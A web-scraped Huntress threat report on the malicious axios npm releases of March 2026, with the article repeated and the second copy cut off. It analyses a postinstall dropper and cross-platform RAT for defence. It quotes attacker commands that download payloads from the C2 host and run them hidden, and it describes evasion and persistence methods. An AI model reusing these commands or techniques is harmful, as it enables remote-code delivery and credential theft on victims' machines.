Supply Chain Compromise of axios npm Package Huntress
pGet full endpoint visibility detection and responseppGet full endpoint visibility detection and responseppProtect your Microsoft 365 and Google Workspace identities and email environmentsppProtect your Microsoft 365 and Google Workspace identities and email environmentsppManaged threat response and robust compliance support at a predictable priceppManaged threat response and robust compliance support at a predictable priceppEmpower your teams with sciencebacked security awareness trainingppEmpower your teams with sciencebacked security awareness trainingppContinuous Microsoft 365 and identity hardening managed and enforced by Huntress expertsppContinuous Microsoft 365 and identity hardening managed and enforced by Huntress expertsppProactively secure endpoints against attacksppProactively secure endpoints against attacksppQuickly deploy and manage realtime protection for endpoints email and employees all from a single dashboardppQuickly deploy and manage realtime protection for endpoints email and employees all from a single dashboardppMost days nothing happens But one day something willppGet the intel on todays cybercriminal groups and learn how to protect yourselfppShape the next big thing in cybersecurity togetherppShape the next big thing in cybersecurity togetherppReal people Real perspectives Better conversationsppReal people Real perspectives Better conversationsppNo products no pitches just tradecraftppNo products no pitches just tradecraftppExposing hidden truths in the world of cybersecurityppExposing hidden truths in the world of cybersecurityppGo beyond AI in the fight against todays hackers with Huntress Managed EDR purposebuilt for your needsppGo beyond AI in the fight against todays hackers with Huntress Managed EDR purposebuilt for your needspp247 Security Operations Centerpp247 Security Operations CenterppWhy businesses of all sizes trust Huntress to defend their assetsppWhy businesses of all sizes trust Huntress to defend their assetsppLearn directly from our partners how Huntress has helped themppLearn directly from our partners how Huntress has helped themppGet in touch with the Huntress Community teamppGet in touch with the Huntress Community teamppLogin to access topnotch marketing resources tools and trainingppLogin to access topnotch marketing resources tools and trainingppJoin our partner community to deliver expertled managed securityppJoin our partner community to deliver expertled managed securityppPartner program designed to grow your cybersecurity businessppPartner program designed to grow your cybersecurity businessppDriving innovation through global technology PartnershipsppDriving innovation through global technology PartnershipsppA LevelUp for Your Business SecurityppA LevelUp for Your Business SecurityppWere on a mission to shatter the barriers to enterpriselevel securityppWere on a mission to shatter the barriers to enterpriselevel securityppExplore press releases news articles media interviews and moreppExplore press releases news articles media interviews and moreppFounded by former NSA Cyber Operators Backed by security researchersppFounded by former NSA Cyber Operators Backed by security researchersppReady to shake up the cybersecurity world Join the huntppReady to shake up the cybersecurity world Join the huntpp
Note This Rapid Response article has been written with AI assistanceppAcknowledgments Special thanks to Jevon Ang Michael Elford Jordan Sexton Armelle French Stephanie Fairless Juzzy Allen Ryan Dowd Chad Hudson Lindon Wass James Maclachlan James Northey Josh Kiriakoff Jai Minton and Max Rogers for their contributions to this investigation and responsepp
ppUPDATE 331 at 630pm ETppSince publishing our analysis last night Huntress has continued to monitor the axios supply chain compromise ppThe Huntress SOC has seen further indicators on systems including a systembat script with a userrun key on a system called Microsoft Update similar to the one seen in the axios compromise which instead contacts calltancom This happens to predate the axios compromise and the exact date of creation is unknown but it shares a similar theme to another domain linked to this compromise callnrwisecom Notably the calltancom domain has been linked back to a binary recently used by DPRK actors by researchers at VolexityppWhile the exact motivation behind the attack remains unclear multiple lines of evidence now point to North Korean statesponsored activity Other researchers including ones at Elastic have noted that the macOS binary delivered by the plaincryptojs postinstall hook has overlaps with a backdoor attributed to a DPRKlinked threat cluster Additionally the internal project name macWebT links directly to BlueNoroffs documented webT module from RustBucket malware campaigns Google Threat Intelligence Group has also attributed the attack to UNC1069 a suspected North Korean threat actor ppWith the malicious packages now removed from the npm registry and the C2 infrastructure offline we do not expect to see new initial exploitation or followon postexploitation activity from the specific addresses identified in this campaign However any system that executed the malicious payload during the exposure window should still be treated as fully compromised Organizations must continue to follow the remediation guidance outlined below including rotating all credentials and rebuilding affected systems as the RATs capabilities for credential theft and data exfiltration mean the full scope of compromise may not be immediately apparentppppppORIGINAL POSTppTLDR Huntress has observed active exploitation of a supply chain compromise targeting the axios npm package one of the most widely used JavaScript libraries with over 100 million weekly downloads The attack delivered a crossplatform Remote Access Trojan RAT to macOS Windows and Linux systems via a malicious dependency injected into backdoored axios releases Organizations should immediately audit their dependencies for email protected or email protected treat any system that installed either version as compromised and follow the remediation guidance belowppppOn March 31 2026 a coordinated supply chain attack was executed against the axios npm package An attacker compromised the npm credentials of the lead maintainer account jasonsaayman and manually published two backdoored releases email protected tagged latest and email protected tagged legacy These versions introduced a phantom dependency email protected a package that had not existed before that day and is never actually imported by axios code Its sole purpose was to execute a postinstall script that drops and runs a crossplatform RAT targeting macOS Windows and Linuxppaxios is a promisebased HTTP client used extensively across the JavaScript and Nodejs ecosystem It is a transitive dependency for countless packages CICD pipelines developer workstations and production applications worldwide The scope of this compromise is significant any environment that ran npm install and resolved to email protected or email protected during the approximately threehour exposure window may have executed the malicious payload automatically with no user interaction requiredppThe malicious versions were published during overnight hours just after midnight UTC Sunday night into Monday morning maximizing the time before maintainers and the npm security team could respond The compromised packages were removed from npm approximately three hours later but the damage was already done Within our partner base Huntress observed at least 135 endpoints across all operating systems contacting the attackers commandandcontrol infrastructure during the exposure windowppppAn attacker gained access to the jasonsaayman npm account the primary maintainer of the opensource axios library The maintainer email was changed from the legitimate address to ifstapprotonme and the attacker bypassed the normal GitHub Actions OIDCbased CICD publishing workflow by publishing directly via the npm CLI using a longlived access tokenppOne critical detail even on the v1x branch where OIDC Trusted Publishing was configured the publish workflow still passed NPMTOKEN as an environment variable alongside OIDC credentials When both are present npm uses the token This meant the longlived token was effectively the authentication method for all publishes regardless of OIDC configurationppThe real maintainer later stated in GitHub issue 10604 im trying to get support to understand how this even happened i have 2fa mfa on practically everything The exact method of token compromise remains undeterminedppppThe attack was prestaged approximately 18 hours before detonation A clean version of email protected was published by an attackercreated account nrwiseprotonme to establish a publishing history on npm This reduced the likelihood that automated scanners would flag the subsequent malicious version purely on account noveltyppTimestamp UTCppEventpp20260330 235912ppemail protected published malicious postinstall payload introducedpp20260331 000541ppSocket automated detection flags email protected as malware 6 min after publishpp20260331 002158ppemail protected published and tagged latest the attack goes livepp20260331 002327ppFirst Huntressobserved infection macOS endpoint executes RAT 89 seconds after publishpp20260331 005805ppFirst Huntressobserved Windows infection via wtexepp20260331 010057ppemail protected published and tagged legacy second branch targetedpp20260331 0329ppplaincryptojs removed from npm by npm security teampp20260331 0330ppCompromised axios versions removed from npmppThe first infection on a Huntressmonitored endpoint landed 89 seconds after email protected was published This is consistent with automated CICD pipelines and developer machines using caret ranges 1x without locked dependencies the malicious version resolved immediately on the next npm installppppWhen email protected was installed as a dependency of the backdoored axios its postinstall hook executed node setupjs This 4209byte JavaScript file used a twolayer obfuscation schemeppReversed Base64 Encoded strings were reversed underscores replaced with padding then base64decodedppXOR cipher Key OrDeR7077 alphabetic characters produce NaN in Number becoming 0 in bitwise operations yielding effective key digits 0000007077ppAll 18 obfuscated strings in the stq array hide module names childprocess os fs the C2 URL shell commands and file paths On execution setupjs detects the operating system via osplatform and launches a platformspecific payloadppmacOS darwin Writes an AppleScript to a temp file which downloads the RAT binary via curlppWindows win32 Writes a VBScript that copies powershellexe to PROGRAMDATAwtexe then downloads and executes a PowerShell RATppLinux Downloads a Python RAT script to tmpldpy and executes itppAfter payload delivery setupjs performs three antiforensics operationsppDeletes itself setupjsppDeletes packagejson which contains the postinstall hookthe evidenceppRenames packagemd to packagejson replacing the manifest with a clean v420 stubppPostcleanup the nodemodulesplaincryptojs directory appears to be a normal crypto library The presence of this directory is itself evidence of compromise even if the contents appear cleanppppThe Windows infection chain proceeds through multiple stages designed to evade detectionppnode setupjspp Writes VBScript to TEMP6202033vbs hidden window style 0pp Copies powershellexe to PROGRAMDATAwtexepp cmdexe c curl s X POST d packagesnpmorgproduct1 httpsfrclakcom80006202033 TEMP6202033ps1pp PROGRAMDATAwtexe w hidden ep bypass file TEMP6202033ps1pp Deletes 6202033ps1pp Deletes 6202033vbsppFigure 1 The Huntress EDR detecting the execution of this attack chainppThe renamed powershellexe wtexe is a deliberate EDR evasion technique wtexe is the legitimate filename for Windows Terminal so processname based heuristics may not flag it The VBScript and PowerShell stages both selfdelete after executionppThe secondstage payload is a fullfeatured PowerShell RAT that was captured by Huntress SOC analysts while the C2 was still serving payloads On first execution it establishes persistenceppCreates PROGRAMDATAsystembat with a download cradle that refetches the RAT from C2 on every loginppSets the systembat file attribute to HiddenppAdds a registry Run key at HKCUSoftwareMicrosoftWindowsCurrentVersionRunMicrosoftUpdate pointing to the batch fileppThe RAT then performs initial reconnaissance enumerating the users Documents Desktop OneDrive AppDataRoaming and all filesystem drive roots It sends this data to the C2 as a FirstInfo beacon then enters a 60second heartbeat loop BaseInfo reporting hostname username OS version and architecture timezone hardware model CPU type boot time install date and a full running process listppThe RAT supports four command handlersppCommandppFunctionppkillppGraceful selfterminationpppeinjectppInmemory NET assembly injection loads a DLL via SystemReflectionAssemblyLoad and invokes ExtensionSubRoutineRun2 with a shellcode payload This enables arbitrary code execution entirely in memory without touching diskpprunscriptppPowerShell execution in three modes inline command base64encoded for scripts 10KB or temp file for scripts 10KB written to TEMPGUIDps1 executed then deletedpprundirppDirectory enumeration with file metadata name size timestamps directory flagppYou can see the full Windows payload at this Github gist httpsgistgithubcomJohnHammonddf0e06df00e993e7917436d0f73df626ppOn macOS the dropper writes an AppleScript to a temporary file which uses curl to download a MachO universal binary supporting both x8664 and ARM64 from the C2 with the POST body packagesnpmorgproduct0 The binary is saved to LibraryCachescomappleactmond deliberately mimicking Apples own comapple naming convention to blend inppThe full observed execution chain from Huntress EDR telemetrypposascript tempscriptpp sh c curl o LibraryCachescomappleactmond d packagesnpmorgproduct0 s httpsfrclakcom80006202033pp chmod 770 LibraryCachescomappleactmondpp binzsh c LibraryCachescomappleactmond httpsfrclakcom80006202033 ppThe macOS RAT is a compiled C binary using the nlohmannjson library and libcurl It provides the same command vocabulary as the Windows variant kill peinject runscript rundir uses the same C2 protocol and performs the same system fingerprinting On macOS it specifically enumerates Applications Library and LibraryApplication Support It adhoc codesigns dropped payloads codesign force deep sign to bypass GatekeeperppThe Linux payload is the most straightforward setupjs writes a shell command that uses curl to download a Python RAT script to tmpldpy and executes it with nohup python3 tmpldpy in the backgroundppThe Python RAT is a 443line script using only standard library modules httpclient subprocess json base64 os platform It reads system information directly from proc and sysclassdmiid rather than relying on external tools It enumerates config Documents and Desktop on first contactppThe peinject command on Linux drops a base64decoded binary to tmprandom6chars dotprefix for hidden sets chmod 777 and executes via subprocessPopenppNotably the Linux variant does not establish persistence A reboot clears the RAT This may reflect an understanding that Linux targets in this context are primarily CICD runners and containers ephemeral by nature where persistence is unnecessary because the value is in the secrets and credentials accessible during the buildppYou can see the full Linux payload at this Github gist httpsgistgithubcomJohnHammond96575799bd87ae64cddbc55634a6d32dppAll three platform variants share an identical C2 protocol and command vocabulary confirming they originate from the same threat actor and development frameworkppFeatureppmacOSppWindowsppLinuxppRuntimeppC MachO UniversalppPowerShell NETppPython 3 stdlibppBeacon Intervalpp60 secondspp60 secondspp60 secondsppC2 ProtocolppHTTP POST Base64 JSONppHTTP POST Base64 JSONppHTTP POST Base64 JSONppUserAgentppIE8WinXP identicalppIE8WinXP identicalppIE8WinXP identicalppPersistenceppLibraryCachescomappleactmondppRegistry Run key hidden systembatppNoneppBinary InjectionppWrite executeppInmemory NET assembly load reflectiveppWrite to tmphiddenppStatus SignalsppWow ZzzppWow ZzzppWow ZzzppAll variants use the same anachronistic UserAgent string mozilla40 compatible msie 80 windows nt 51 trident40 an Internet Explorer 8 string on Windows XP In 2026 this is highly anomalous and a reliable detection indicatorppThe C2 server at sfrclakcom8000 uses the URL path 6202033 as a campaign identifier ppPerhaps an easter egg that we found amusingthe numbers 6202033 reversed are conveniently 3302026 the date of the attackppPOST bodies are designed to mimic npm registry trafficppPlatformppPOST BodyppmacOSpppackagesnpmorgproduct0ppWindowspppackagesnpmorgproduct1ppLinuxpppackagesnpmorgproduct2ppThe packagesnpmorg prefix is a SIEM evasion technique it resembles legitimate npm traffic in log analysis However npmorg is not the npm registrythat domain has belonged to the National Association of Pastoral Musicians since 1997 The product number suffix enables serverside platform routing from a single endpointppppThe Huntress SOC was fortunate to investigate this attack before the broader security community publicly raised the alarm Here is how the response unfolded with fun raw screenshots from our own internal Slack ppAt 949 PM ET on March 30 Huntress SOC analyst Jevon Ang flagged CProgramDatawtexe appearing on multiple hosts across different organizations and accounts This indicated not a single anomalous process on a single machine but a pattern across multiple organizationsppppSOC analyst Michael Elford traced the full execution chain directories containing plaincryptojs setupjs VBScript renamed PowerShell wtexe PowerShell script from temp directory all reaching out to sfrclakcom He identified the persistence mechanism MicrosoftUpdate registry key systembat and noted that one instance had been blocked by DefenderppAt 1000 PM Chad Hudson identified the evasion technique wtexe is just Windows Terminal being used as a PowerShell bypass The threat actor had copied powershellexe to CProgramDatawtexe to disguise execution as Windows Terminal and bypass processname heuristicsppBy 1017 PM Jordan Sexton shared the complete Windows stage2 RAT source code captured while the C2 was still actively serving payloads Minutes later by 1025 PM the C2 was already going intermittent Chad Hudson noted sandbox isnt replicatingas dynamic analysis environments could no longer retrieve the payload ppAt 1022 PM Chad documented the full observed execution chainppnode setupjspp cmdexepp cscriptexe runs temp VBSpp cmdexepp curl POST to C2pp writes payload 6202033ps1pp executes via wtexe hidden bypasspp deletes payloadppAt 1038 PM the SOC confirmed the attack was broader than initially appeared Jordan Sexton noted one machine appeared to be hit via a yarn datadog package Michael Elford confirmed coming from multiple sources and not just OpenClaw He found a malicious dependency even within a Wordpress module nested at CUsersREDACTEDAppDataRoamingnpmnodemoduleswordpressscriptsnodemodulesplaincryptojsconfirming the supply chain propagated through any package that transitively depended on axiosppppAt 1056 PM Max Rogers shared the Feross Socket Security tweet in the SOC channel the first public alarm about the axios compromise The Huntress SOC had already been investigating for over an hourppSoon we understood the full scale in the moment 135 results across all operating systems contacting sfrclakcomppppOn every compromised host the RAT performed immediate system reconnaissance enumerating user directories filesystem drive roots and running processes and transmitted this data to the C2 The RAT maintained a 60second beacon loop ready to accept further commands including arbitrary script execution and inmemory binary injection For Windows hosts the RAT established persistence that would survive reboots and redownload the payload on every user loginppDeveloper workstations and CICD runners are highvalue targets These environments commonly hold npm tokens SSH keys cloud credentials API keys env files and other secrets Any system that executed the malicious payload should be treated as a full credentialtheft scenarioppppMany of these mitigations are credited to StepSecuritys great writeup and effort in sounding the alarm about this widespread supplychain attackpp1 Check your lockfiles packagelockjson yarnlock pnpmlockyaml forppemail protectedppemail protectedppAny version of plaincryptojspppp2 Check for the malicious dependency directoryppls nodemodulesplaincryptojs 2devnull echo POTENTIALLY AFFECTEDppThe directory presence is sufficient evidence even if packagejson inside appears clean due to the antiforensics swappppp3 Check endpoints for platformspecific artifactsppmacOsppls la LibraryCachescomappleactmondppWindows cmdexeppdir PROGRAMDATAwtexeppdir PROGRAMDATAsystembatppreg query HKCUSoftwareMicrosoftWindowsCurrentVersionRun v MicrosoftUpdateppLinuxppls la tmpldpypp4 Check networkDNS logs for connections to sfrclakcom or 1421120673 on port 8000pppp Pin to safe versions immediatelypp Add overrides to prevent transitive resolutionpppp overrides axios 1140 pp resolutions axios 1140 pppp Remove the malicious dependency
pprm rf nodemodulesplaincryptojsppnpm install ignorescriptspp
pp If RAT artifacts are found on an endpoint Do not attempt to clean in place Rebuild from a knowngood imagepp
Rotate all credentials accessible from affected systems npm tokens AWS keys SSH keys CICD secrets env values cloud credentials OAuth tokens API keys
pp
Block the C2 at the network perimeter
ppDomain sfrclakcomppIP 1421120673ppPort 8000pp
Clean npm cache npm cache clean force
ppppAlways commit lockfiles and use npm ci instead of npm install in CICDppSet npm config set minreleaseage 3 to enforce a 4872 hour quarantine on new package versionsppUse ignorescripts as a standing CICD policy where possibleppImplement OIDC Trusted Publishing for npm publishes and remove longlived npm tokens even when OIDC is configured a coexisting token takes precedenceppDeploy software composition analysis SCA tooling with realtime malware detectionppppHuntress has deployed detections covering all platform variants of this attack includingppNetwork C2 activity to sfrclakcom8000 and the RAT callback patternsppExecution of the plaincryptojs postinstall dropper and the obfuscated setupjs behaviorppPlatformspecific artifactsppmacOS LibraryCachescomappleactmondppWindows PROGRAMDATAwtexe shortlived temp scripts and the MicrosoftUpdate registry persistenceppLinux tmpldpy and related Python execution chainsppProcess trees consistent with node cmdcscript wtexe on Windows and osascript curl comappleactmond on macOSppWe are actively hunting across Huntressmonitored endpoints and working directly with affected partners on hostlevel investigation and remediationppppPackageppVersionppSHA1ppaxiospp1141 MALICIOUSpp2553649f2322049666871cea80a5d0d6adc700cappaxiospp0304 MALICIOUSppd6f3f62fd3b9f5432f5782b62d8cfd5247d5ee71ppplaincryptojspp421 MALICIOUSpp07d889e2dadce6f3910dcbc253317d28ca61c766ppPlatformppSHA256ppDescriptionppWindows Stage 1ppf7d335205b8d7b20208fb3ef93ee6dc817905dc3ae0c10a0b164f4e7d07121cdppPowerShell download cradleppWindows Stage 2pp617b67a8e1210e4fc87c92d1d1da45a2f311c08d26e89b12307cf583c900d101ppPowerShell RATppmacOSpp92ff08773995ebc8d55ec4b8e1a225d0d1e51efa4ef88b8849d0071230c9645appMachO Universal Binary x8664 ARM64ppLinuxppfcb81618bb15edfdedfb638b4c08a2af9cac9ecfa551af135a8402bf980375cfppPython RAT scriptppIndicatorppTypeppDescriptionppsfrclakcomppDomainppC2 serverpp1421120673ppIP AddressppC2 IPpphxxpsfrclakcom80006202033ppURLppC2 endpointpppackagesnpmorgproduct0ppPOST BodyppmacOS C2 beaconpppackagesnpmorgproduct1ppPOST BodyppWindows C2 beaconpppackagesnpmorgproduct2ppPOST BodyppLinux C2 beaconppmozilla40 compatible msie 80 windows nt 51 trident40ppUserAgentppRAT beacon all platformsppPlatformppPathppDescriptionppmacOSppLibraryCachescomappleactmondppStage2 MachO RAT binaryppWindowsppPROGRAMDATAwtexeppRenamed powershellexe persistentppWindowsppPROGRAMDATAsystembatppHidden persistence batch fileppWindowsppTEMP6202033vbsppVBScript launcher selfdeletesppWindowsppTEMP6202033ps1ppPowerShell payload selfdeletesppLinuxpptmpldpyppPython RAT scriptppAllppnodemodulesplaincryptojsppMalicious dependency directoryppKeyppValue NameppDatappHKCUSoftwareMicrosoftWindowsCurrentVersionRunppMicrosoftUpdateppPROGRAMDATAsystembatppIndicatorppDescriptionppifstapprotonmeppEmail set on compromised jasonsaayman npm accountppnrwiseprotonmeppAttackercreated npm account that published plaincryptojsppppSocket Security axios Compromised on npmppStepSecurity axios Compromised on npm Malicious Versions Drop Remote Access TrojanppAikido axios npm Compromised Maintainer Hijacked RAT DeployedppJoe Desimone Elastic Security Technical Analysis GistppGitHub Issue 10604 axios Maintainer ResponseppFeross Aboukhadijeh Socket Initial Public Alertppaxios Deprecation Workflow for Compromised Versionsppnpm Package plaincryptojs v421 setupjs source ppppppppProtecting 242k customers like you with enterprisegrade protectionppGet insider access to Huntress tradecraft killer events and the freshest blog updatesp
Note This Rapid Response article has been written with AI assistanceppAcknowledgments Special thanks to Jevon Ang Michael Elford Jordan Sexton Armelle French Stephanie Fairless Juzzy Allen Ryan Dowd Chad Hudson Lindon Wass James Maclachlan James Northey Josh Kiriakoff Jai Minton and Max Rogers for their contributions to this investigation and responsepp
ppUPDATE 331 at 630pm ETppSince publishing our analysis last night Huntress has continued to monitor the axios supply chain compromise ppThe Huntress SOC has seen further indicators on systems including a systembat script with a userrun key on a system called Microsoft Update similar to the one seen in the axios compromise which instead contacts calltancom This happens to predate the axios compromise and the exact date of creation is unknown but it shares a similar theme to another domain linked to this compromise callnrwisecom Notably the calltancom domain has been linked back to a binary recently used by DPRK actors by researchers at VolexityppWhile the exact motivation behind the attack remains unclear multiple lines of evidence now point to North Korean statesponsored activity Other researchers including ones at Elastic have noted that the macOS binary delivered by the plaincryptojs postinstall hook has overlaps with a backdoor attributed to a DPRKlinked threat cluster Additionally the internal project name macWebT links directly to BlueNoroffs documented webT module from RustBucket malware campaigns Google Threat Intelligence Group has also attributed the attack to UNC1069 a suspected North Korean threat actor ppWith the malicious packages now removed from the npm registry and the C2 infrastructure offline we do not expect to see new initial exploitation or followon postexploitation activity from the specific addresses identified in this campaign However any system that executed the malicious payload during the exposure window should still be treated as fully compromised Organizations must continue to follow the remediation guidance outlined below including rotating all credentials and rebuilding affected systems as the RATs capabilities for credential theft and data exfiltration mean the full scope of compromise may not be immediately apparentppppppORIGINAL POSTppTLDR Huntress has observed active exploitation of a supply chain compromise targeting the axios npm package one of the most widely used JavaScript libraries with over 100 million weekly downloads The attack delivered a crossplatform Remote Access Trojan RAT to macOS Windows and Linux systems via a malicious dependency injected into backdoored axios releases Organizations should immediately audit their dependencies for email protected or email protected treat any system that installed either version as compromised and follow the remediation guidance belowppppOn March 31 2026 a coordinated supply chain attack was executed against the axios npm package An attacker compromised the npm credentials of the lead maintainer account jasonsaayman and manually published two backdoored releases email protected tagged latest and email protected tagged legacy These versions introduced a phantom dependency email protected a package that had not existed before that day and is never actually imported by axios code Its sole purpose was to execute a postinstall script that drops and runs a crossplatform RAT targeting macOS Windows and Linuxppaxios is a promisebased HTTP client used extensively across the JavaScript and Nodejs ecosystem It is a transitive dependency for countless packages CICD pipelines developer workstations and production applications worldwide The scope of this compromise is significant any environment that ran npm install and resolved to email protected or email protected during the approximately threehour exposure window may have executed the malicious payload automatically with no user interaction requiredppThe malicious versions were published during overnight hours just after midnight UTC Sunday night into Monday morning maximizing the time before maintainers and the npm security team could respond The compromised packages were removed from npm approximately three hours later but the damage was already done Within our partner base Huntress observed at least 135 endpoints across all operating systems contacting the attackers commandandcontrol infrastructure during the exposure windowppppAn attacker gained access to the jasonsaayman npm account the primary maintainer of the opensource axios library The maintainer email was changed from the legitimate address to ifstapprotonme and the attacker bypassed the normal GitHub Actions OIDCbased CICD publishing workflow by publishing directly via the npm CLI using a longlived access tokenppOne critical detail even on the v1x branch where OIDC Trusted Publishing was configured the publish workflow still passed NPMTOKEN as an environment variable alongside OIDC credentials When both are present npm uses the token This meant the longlived token was effectively the authentication method for all publishes regardless of OIDC configurationppThe real maintainer later stated in GitHub issue 10604 im trying to get support to understand how this even happened i have 2fa mfa on practically everything The exact method of token compromise remains undeterminedppppThe attack was prestaged approximately 18 hours before detonation A clean version of email protected was published by an attackercreated account nrwiseprotonme to establish a publishing history on npm This reduced the likelihood that automated scanners would flag the subsequent malicious version purely on account noveltyppTimestamp UTCppEventpp20260330 235912ppemail protected published malicious postinstall payload introducedpp20260331 000541ppSocket automated detection flags email protected as malware 6 min after publishpp20260331 002158ppemail protected published and tagged latest the attack goes livepp20260331 002327ppFirst Huntressobserved infection macOS endpoint executes RAT 89 seconds after publishpp20260331 005805ppFirst Huntressobserved Windows infection via wtexepp20260331 010057ppemail protected published and tagged legacy second branch targetedpp20260331 0329ppplaincryptojs removed from npm by npm security teampp20260331 0330ppCompromised axios versions removed from npmppThe first infection on a Huntressmonitored endpoint landed 89 seconds after email protected was published This is consistent with automated CICD pipelines and developer machines using caret ranges 1x without locked dependencies the malicious version resolved immediately on the next npm installppppWhen email protected was installed as a dependency of the backdoored axios its postinstall hook executed node setupjs This 4209byte JavaScript file used a twolayer obfuscation schemeppReversed Base64 Encoded strings were reversed underscores replaced with padding then base64decodedppXOR cipher Key OrDeR7077 alphabetic characters produce NaN in Number becoming 0 in bitwise operations yielding effective key digits 0000007077ppAll 18 obfuscated strings in the stq array hide module names childprocess os fs the C2 URL shell commands and file paths On execution setupjs detects the operating system via osplatform and launches a platformspecific payloadppmacOS darwin Writes an AppleScript to a temp file which downloads the RAT binary via curlppWindows win32 Writes a VBScript that copies powershellexe to PROGRAMDATAwtexe then downloads and executes a PowerShell RATppLinux Downloads a Python RAT script to tmpldpy and executes itppAfter payload delivery setupjs performs three antiforensics operationsppDeletes itself setupjsppDeletes packagejson which contains the postinstall hookthe evidenceppRenames packagemd to packagejson replacing the manifest with a clean v420 stubppPostcleanup the nodemodulesplaincryptojs directory appears to be a normal crypto library The presence of this directory is itself evidence of compromise even if the contents appear cleanppppThe Windows infection chain proceeds through multiple stages designed to evade detectionppnode setupjspp Writes VBScript to TEMP6202033vbs hidden window style 0pp Copies powershellexe to PROGRAMDATAwtexepp cmdexe c curl s X POST d packagesnpmorgproduct1 httpsfrclakcom80006202033 TEMP6202033ps1pp PROGRAMDATAwtexe w hidden ep bypass file TEMP6202033ps1pp Deletes 6202033ps1pp Deletes 6202033vbsppFigure 1 The Huntress EDR detecting the execution of this attack chainppThe renamed powershellexe wtexe is a deliberate EDR evasion technique wtexe is the legitimate filename for Windows Terminal so processname based heuristics may not flag it The VBScript and PowerShell stages both selfdelete after executionppThe secondstage payload is a fullfeatured PowerShell RAT that was captured by Huntress SOC analysts while the C2 was still serving payloads On first execution it establishes persistenceppCreates PROGRAMDATAsystembat with a download cradle that refetches the RAT from C2 on every loginppSets the systembat file attribute to HiddenppAdds a registry Run key at HKCUSoftwareMicrosoftWindowsCurrentVersionRunMicrosoftUpdate pointing to the batch fileppThe RAT then performs initial reconnaissance enumerating the users Documents Desktop OneDrive AppDataRoaming and all filesystem drive roots It sends this data to the C2 as a FirstInfo beacon then enters a 60second heartbeat loop BaseInfo reporting hostname username OS version and architecture timezone hardware model CPU type boot time install date and a full running process listppThe RAT supports four command handlersppCommandppFunctionppkillppGraceful selfterminationpppeinjectppInmemory NET assembly injection loads a DLL via SystemReflectionAssemblyLoad and invokes ExtensionSubRoutineRun2 with a shellcode payload This enables arbitrary code execution entirely in memory without touching diskpprunscriptppPowerShell execution in three modes inline command base64encoded for scripts 10KB or temp file for scripts 10KB written to TEMPGUIDps1 executed then deletedpprundirppDirectory enumeration with file metadata name size timestamps directory flagppYou can see the full Windows payload at this Github gist httpsgistgithubcomJohnHammonddf0e06df00e993e7917436d0f73df626ppOn macOS the dropper writes an AppleScript to a temporary file which uses curl to download a MachO universal binary supporting both x8664 and ARM64 from the C2 with the POST body packagesnpmorgproduct0 The binary is saved to LibraryCachescomappleactmond deliberately mimicking Apples own comapple naming convention to blend inppThe full observed execution chain from Huntress EDR telemetrypposascript tempscriptpp sh c curl o LibraryCachescomappleactmond d packagesnpmorgproduct0 s httpsfrclakcom80006202033pp chmod 770 LibraryCachescomappleactmondpp binzsh c LibraryCachescomappleactmond httpsfrclakcom80006202033 ppThe macOS RAT is a compiled C binary using the nlohmannjson library and libcurl It provides the same command vocabulary as the Windows variant kill peinject runscript rundir uses the same C2 protocol and performs the same system fingerprinting On macOS it specifically enumerates Applications Library and LibraryApplication Support It adhoc codesigns dropped payloads codesign force deep sign to bypass GatekeeperppThe Linux payload is the most straightforward setupjs writes a shell command that uses curl to download a Python RAT script to tmpldpy and executes it with nohup python3 tmpldpy in the backgroundppThe Python RAT is a 443line script using only standard library modules httpclient subprocess json base64 os platform It reads system information directly from proc and sysclassdmiid rather than relying on external tools It enumerates config Documents and Desktop on first contactppThe peinject command on Linux drops a base64decoded binary to tmprandom6chars dotprefix for hidden sets chmod 777 and executes via subprocessPopenppNotably the Linux variant does not establish persistence A reboot clears the RAT This may reflect an understanding that Linux targets in this context are primarily CICD runners and containers ephemeral by nature where persistence is unnecessary because the value is in the secrets and credentials accessible during the buildppYou can see the full Linux payload at this Github gist httpsgistgithubcomJohnHammond96575799bd87ae64cddbc55634a6d32dppAll three platform variants share an identical C2 protocol and command vocabulary confirming they originate from the same threat actor and development frameworkppFeatureppmacOSppWindowsppLinuxppRuntimeppC MachO UniversalppPowerShell NETppPython 3 stdlibppBeacon Intervalpp60 secondspp60 secondspp60 secondsppC2 ProtocolppHTTP POST Base64 JSONppHTTP POST Base64 JSONppHTTP POST Base64 JSONppUserAgentppIE8WinXP identicalppIE8WinXP identicalppIE8WinXP identicalppPersistenceppLibraryCachescomappleactmondppRegistry Run key hidden systembatppNoneppBinary InjectionppWrite executeppInmemory NET assembly load reflectiveppWrite to tmphiddenppStatus SignalsppWow ZzzppWow ZzzppWow ZzzppAll variants use the same anachronistic UserAgent string mozilla40 compatible msie 80 windows nt 51 trident40 an Internet Explorer 8 string on Windows XP In 2026 this is highly anomalous and a reliable detection indicatorppThe C2 server at sfrclakcom8000 uses the URL path 6202033 as a campaign identifier ppPerhaps an easter egg that we found amusingthe numbers 6202033 reversed are conveniently 3302026 the date of the attackppPOST bodies are designed to mimic npm registry trafficppPlatformppPOST BodyppmacOSpppackagesnpmorgproduct0ppWindowspppackagesnpmorgproduct1ppLinuxpppackagesnpmorgproduct2ppThe packagesnpmorg prefix is a SIEM evasion technique it resembles legitimate npm traffic in log analysis However npmorg is not the npm registrythat domain has belonged to the National Association of Pastoral Musicians since 1997 The product number suffix enables serverside platform routing from a single endpointppppThe Huntress SOC was fortunate to investigate this attack before the broader security community publicly raised the alarm Here is how the response unfolded with fun raw screenshots from our own internal Slack ppAt 949 PM ET on March 30 Huntress SOC analyst Jevon Ang flagged CProgramDatawtexe appearing on multiple hosts across different organizations and accounts This indicated not a single anomalous process on a single machine but a pattern across multiple organizationsppppSOC analyst Michael Elford traced the full execution chain directories containing plaincryptojs setupjs VBScript renamed PowerShell wtexe PowerShell script from temp directory all reaching out to sfrclakcom He identified the persistence mechanism MicrosoftUpdate registry key systembat and noted that one instance had been blocked by DefenderppAt 1000 PM Chad Hudson identified the evasion technique wtexe is just Windows Terminal being used as a PowerShell bypass The threat actor had copied powershellexe to CProgramDatawtexe to disguise execution as Windows Terminal and bypass processname heuristicsppBy 1017 PM Jordan Sexton shared the complete Windows stage2 RAT source code captured while the C2 was still actively serving payloads Minutes later by 1025 PM the C2 was already going intermittent Chad Hudson noted sandbox isnt replicatingas dynamic analysis environments could no longer retrieve the payload ppAt 1022 PM Chad documented the full observed execution chainppnode setupjspp cmdexepp cscriptexe runs temp VBSpp cmdexepp curl POST to C2pp writes payload 6202033ps1pp executes via wtexe hidden bypasspp deletes payloadppAt 1038 PM the SOC confirmed the attack was broader than initially appeared Jordan Sexton noted one machine appeared to be hit via a yarn datadog package Michael Elford confirmed coming from multiple sources and not just OpenClaw He found a malicious 